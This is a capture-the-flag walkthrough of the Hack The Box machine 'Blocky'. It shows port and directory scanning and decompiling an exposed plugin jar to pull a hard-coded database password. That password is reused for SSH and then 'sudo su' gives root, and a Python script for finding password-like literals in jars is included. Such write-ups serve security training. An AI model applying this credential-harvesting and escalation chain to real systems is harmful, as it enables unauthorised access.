2020-04-07
HTB::Blocky Walkthrough
0x01 Info Card
nmap
dirsearch
wpscan
jad
0x03 Pentesting
Initial Enumeration
nmap scan
```
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-14 10:54 CET
Nmap scan report for 10.10.10.37
Host is up (0.085s latency).
Not shown: 996 filtered ports
PORT     STATE  SERVICE VERSION
21/tcp   open   ftp     ProFTPD 1.3.5a
22/tcp   open   ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 d6:2b:99:b4:d5:e7:53:ce:2b:fc:b5:d7:9d:79:fb:a2 (RSA)
|   256 5d:7f:38:95:70:c9:be:ac:67:a0:1e:86:e7:97:84:03 (ECDSA)
|_  256 09:d5:c2:04:95:1a:90:ef:87:56:25:97:df:83:70:67 (ED25519)
80/tcp   open   http    Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: WordPress 4.8
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: BlockyCraft – Under Construction!
8192/tcp closed sophos
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.32 seconds
```

Three services are reachable: FTP (ProFTPD 1.3.5a), SSH, and an Apache host serving WordPress 4.8 (the `http-generator` meta tag gives the version away). The web server is the obvious place to start.
dirsearch scan
```
$ ./dirsearch.py -u 10.10.10.37 -e *

[08:44:06] 301 -    0B  - /index.php  ->  http://10.10.10.37/
[08:44:09] 301 -  315B  - /javascript  ->  http://10.10.10.37/javascript/
[08:44:13] 200 -   19KB - /license.txt
[08:44:37] 301 -  315B  - /phpmyadmin  ->  http://10.10.10.37/phpmyadmin/
[08:44:41] 200 -   10KB - /phpmyadmin/
[08:44:42] 301 -  312B  - /plugins  ->  http://10.10.10.37/plugins/
[08:44:46] 200 -    7KB - /readme.html
[08:44:52] 403 -  299B  - /server-status
[08:44:52] 403 -  300B  - /server-status/
[08:45:21] 200 -  380B  - /wiki/
[08:45:21] 301 -  313B  - /wp-admin  ->  http://10.10.10.37/wp-admin/
[08:45:21] 301 -  309B  - /wiki  ->  http://10.10.10.37/wiki/
[08:45:21] 302 -    0B  - /wp-admin/  ->  http://10.10.10.37/wp-login.php?redirect_to=http%3A%2F%2F10.10.10.37%2Fwp-admin%2F&reauth=1
[08:45:22] 200 -    1KB - /wp-admin/install.php
[08:45:22] 500 -    4KB - /wp-admin/setup-config.php
[08:45:22] 200 -    0B  - /wp-content/
[08:45:22] 301 -  315B  - /wp-content  ->  http://10.10.10.37/wp-content/
[08:45:23] 200 -   69B  - /wp-content/plugins/akismet/akismet.php
[08:45:23] 200 -  965B  - /wp-content/uploads/
[08:45:23] 301 -  316B  - /wp-includes  ->  http://10.10.10.37/wp-includes/
[08:45:23] 500 -    0B  - /wp-includes/rss-functions.php
[08:45:23] 200 -    2KB - /wp-login.php
[08:45:23] 200 -   40KB - /wp-includes/
[08:45:24] 405 -   42B  - /xmlrpc.php

Task Completed
```

Besides the standard WordPress paths, two directories stand out: `/phpmyadmin/` (a database console) and `/plugins/`, which is not the WordPress plugin directory (`/wp-content/plugins/`) but a separate listing.
wpscan
```
[i] User(s) Identified:

[+] notch
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://10.10.10.37/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] Notch
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] WPVulnDB API OK
 | Plan: free
 | Requests Done (during the scan): 3
 | Requests Remaining: 47
```

wpscan identifies a single WordPress author, `notch`, confirmed through the REST API user listing and the login error messages. Keep that username in mind: it is the one we will try any discovered password against.
Getting User Access
Visit http://10.10.10.37/plugins/ (the directory found by the dirsearch scan) and download BlockyCore.jar. A .jar is an ordinary zip archive, so extracting it yields BlockyCore.class; the class is compressed inside the jar, which is why `strings` on the jar itself shows nothing useful. To read the class's contents, decompile it with jad:
```
$ jad BlockyCore.class
Parsing BlockyCore.class...The class file version is 52.0 (only 45.3, 46.0 and 47.0 are supported)
Generating BlockyCore.jad
$ cat BlockyCore.jad
// Decompiled by Jad v1.5.8e. Copyright 2001 Pavel Kouznetsov.
// Jad home page: http://www.geocities.com/kpdus/jad.html
// Decompiler options: packimports(3)
// Source File Name:   BlockyCore.java

package com.myfirstplugin;


public class BlockyCore
{

    public BlockyCore()
    {
        sqlHost = "localhost";
        sqlUser = "root";
        sqlPass = "8YsqfCTnvxAUeduzjNSXe22";
    }

    public void onServerStart()
    {
    }

    public void onServerStop()
    {
    }

    public void onPlayerJoin()
    {
        sendMessage("TODO get username", "Welcome to the BlockyCraft!!!!!!!");
    }

    public void sendMessage(String s, String s1)
    {
    }

    public String sqlHost;
    public String sqlUser;
    public String sqlPass;
}
```
The constructor hard-codes the plugin's MySQL credentials: user `root`, password `8YsqfCTnvxAUeduzjNSXe22`. `root` here is the database user, not a system account, but the password was chosen by the same administrator whose WordPress account wpscan enumerated, so the pair to try over SSH is notch : 8YsqfCTnvxAUeduzjNSXe22.
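Jad's warning that class version 52.0 (Java 8) is unsupported is a reminder that an old decompiler can fail on newer bytecode, and a leaked password does not need a decompiler at all: string literals sit in the class file's constant pool as CONSTANT_String entries pointing at CONSTANT_Utf8 text, and the field names a class writes are reachable through CONSTANT_Fieldref and CONSTANT_NameAndType. The Python script below is an added example, not code from the original walkthrough: it walks every .class inside a jar, parses the constant pool by the JVM specification's tag sizes, and reports literals that look like passwords or that live in a class which writes a field named like a secret. The jar it scans by default is constructed inside the script to mirror the decompiled BlockyCore (same field names and literals); it is not the real plugin from the box, and the `looks_like_secret` and `SENSITIVE_FIELD` heuristics are this example's own.

```python
import io
import re
import struct
import sys
import zipfile

# Payload size of each fixed-width constant-pool tag (JVM spec 4.4); Utf8 (tag 1) is
# variable-length, and Long/Double (5, 6) also occupy two pool indices.
_FIXED = {3: 4, 4: 4, 5: 8, 6: 8, 7: 2, 8: 2, 9: 4, 10: 4, 11: 4, 12: 4,
          15: 3, 16: 2, 17: 4, 18: 4, 19: 2, 20: 2}
# Field names that suggest a credential is being assigned (this example's own heuristic).
SENSITIVE_FIELD = re.compile(r"pass|pwd|secret|token|apikey", re.I)

def parse_constant_pool(data: bytes):
    """Return (utf8 {index: text}, string literals, field names) for one .class file."""
    if data[:4] != b"\xca\xfe\xba\xbe":
        raise ValueError("not a class file")
    count = struct.unpack(">H", data[8:10])[0]
    pos, i = 10, 1
    utf8, string_refs, fieldrefs, name_and_type = {}, [], [], {}
    while i < count:
        tag = data[pos]
        pos += 1
        if tag == 1:
            ln = struct.unpack(">H", data[pos:pos + 2])[0]
            utf8[i] = data[pos + 2:pos + 2 + ln].decode("utf-8", "replace")
            pos += 2 + ln
        else:
            if tag == 8:     # CONSTANT_String -> index of its Utf8 text
                string_refs.append(struct.unpack(">H", data[pos:pos + 2])[0])
            elif tag == 9:   # CONSTANT_Fieldref -> (class, NameAndType); keep the latter
                fieldrefs.append(struct.unpack(">H", data[pos + 2:pos + 4])[0])
            elif tag == 12:  # CONSTANT_NameAndType -> (name, descriptor); keep the name
                name_and_type[i] = struct.unpack(">H", data[pos:pos + 2])[0]
            pos += _FIXED[tag]  # KeyError here means an unknown tag, i.e. a malformed file
        i += 2 if tag in (5, 6) else 1
    strings = [utf8[r] for r in string_refs if r in utf8]
    names = {utf8[name_and_type[n]] for n in fieldrefs
             if n in name_and_type and name_and_type[n] in utf8}
    return utf8, strings, names

def looks_like_secret(s: str) -> bool:
    """Password-shaped literal: 12+ chars, no spaces, mixed case plus digits."""
    return (len(s) >= 12 and " " not in s
            and re.search(r"[a-z]", s) is not None
            and re.search(r"[A-Z]", s) is not None
            and re.search(r"[0-9]", s) is not None)

def scan_jar(jar_bytes: bytes):
    """Report (class path, literal, reason) for every .class inside a jar."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".class"):
                continue
            _, strings, fields = parse_constant_pool(zf.read(name))
            sensitive = sorted(f for f in fields if SENSITIVE_FIELD.search(f))
            for s in strings:
                if looks_like_secret(s):
                    findings.append((name, s, "password-like literal"))
                elif sensitive:
                    findings.append((name, s, "literal in class writing " + ",".join(sensitive)))
    return findings

def _u2(n: int) -> bytes:
    return struct.pack(">H", n)

def build_sample_class() -> bytes:
    """Constructed stand-in for BlockyCore.class (not the real file from the box): a minimal
    Java 8 class file whose constant pool mirrors the decompiled plugin's fields and literals."""
    entries, nxt = [], [1]
    def add(b: bytes, slots: int = 1) -> int:
        entries.append(b)
        nxt[0] += slots
        return nxt[0] - slots
    def utf8(s: str) -> int:
        return add(b"\x01" + _u2(len(s.encode())) + s.encode())
    this_cls = add(b"\x07" + _u2(utf8("com/myfirstplugin/BlockyCore")))
    super_cls = add(b"\x07" + _u2(utf8("java/lang/Object")))
    desc = utf8("Ljava/lang/String;")
    for field, literal in (("sqlHost", "localhost"), ("sqlUser", "root"),
                           ("sqlPass", "8YsqfCTnvxAUeduzjNSXe22")):
        nat = add(b"\x0c" + _u2(utf8(field)) + _u2(desc))  # NameAndType
        add(b"\x09" + _u2(this_cls) + _u2(nat))             # Fieldref
        add(b"\x08" + _u2(utf8(literal)))                   # String literal
    add(b"\x05" + struct.pack(">q", 20170725), slots=2)     # Long, exercises the 2-slot rule
    return (b"\xca\xfe\xba\xbe" + _u2(0) + _u2(52) + _u2(nxt[0]) + b"".join(entries)
            + _u2(0x0021) + _u2(this_cls) + _u2(super_cls) + _u2(0) * 4)

def build_sample_jar() -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("com/myfirstplugin/BlockyCore.class", build_sample_class())
    return buf.getvalue()

if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_jar()
    for cls, literal, reason in scan_jar(data):
        print(f"{cls}: {literal!r}  ({reason})")
```

Run it as `python3 jarsecrets.py BlockyCore.jar` against a downloaded jar (the file name is arbitrary); with no argument it scans the built-in sample and lists `localhost`, `root` and the password, the last flagged as password-shaped. Because the parser only needs the constant pool and skips every other tag by size, it works on any class file version, including the Java 8 bytecode jad complained about; when full source is needed, a decompiler that supports current bytecode (CFR, Procyon or jadx) is the better tool than jad.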
SSH with notch
```
$ ssh notch@10.10.10.37
notch@10.10.10.37's password:
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

7 packages can be updated.
7 updates are security updates.

Last login: Tue Jul 25 11:14:53 2017 from 10.10.14.230
notch@Blocky:~$ id
uid=1000(notch) gid=1000(notch) groups=1000(notch),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
notch@Blocky:~$ ls
minecraft  user.txt
notch@Blocky:~$ cat user.txt
59fee0977fb60b8a0bc6e41e751f3cd5
```

The reused password works for SSH. Note the group list from `id`: notch is a member of `sudo` (and of `adm` and `lxd`), which already hints at the privilege-escalation path.
Getting Root Access
```
notch@Blocky:~$ cat .bash_history
sudo su
cat .bash_history
echo "" > .bash_history
exit
poweroff
sudo poweroff
notch@Blocky:~$ sudo -l
[sudo] password for notch:
Matching Defaults entries for notch on Blocky:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User notch may run the following commands on Blocky:
    (ALL : ALL) ALL
```
Get the root flag: `sudo -l` shows that notch may run any command as any user, and the shell history shows the administrator already used `sudo su`. Running `sudo su` with notch's password gives a root shell, from which the root flag can be read.
0x04 Conclusion
The whole chain rests on credential hygiene. A plugin jar with a hard-coded database password was left in a publicly browsable directory; the same password was reused for the administrator's system account; and that account has unrestricted sudo, so a single leaked string went from anonymous web visitor to root. Keeping secrets out of shipped artifacts, not reusing passwords across services, and limiting sudo to the commands actually needed would each have broken the chain.
0x05 Reference
https://ech1.netlify.com/htb/easy/1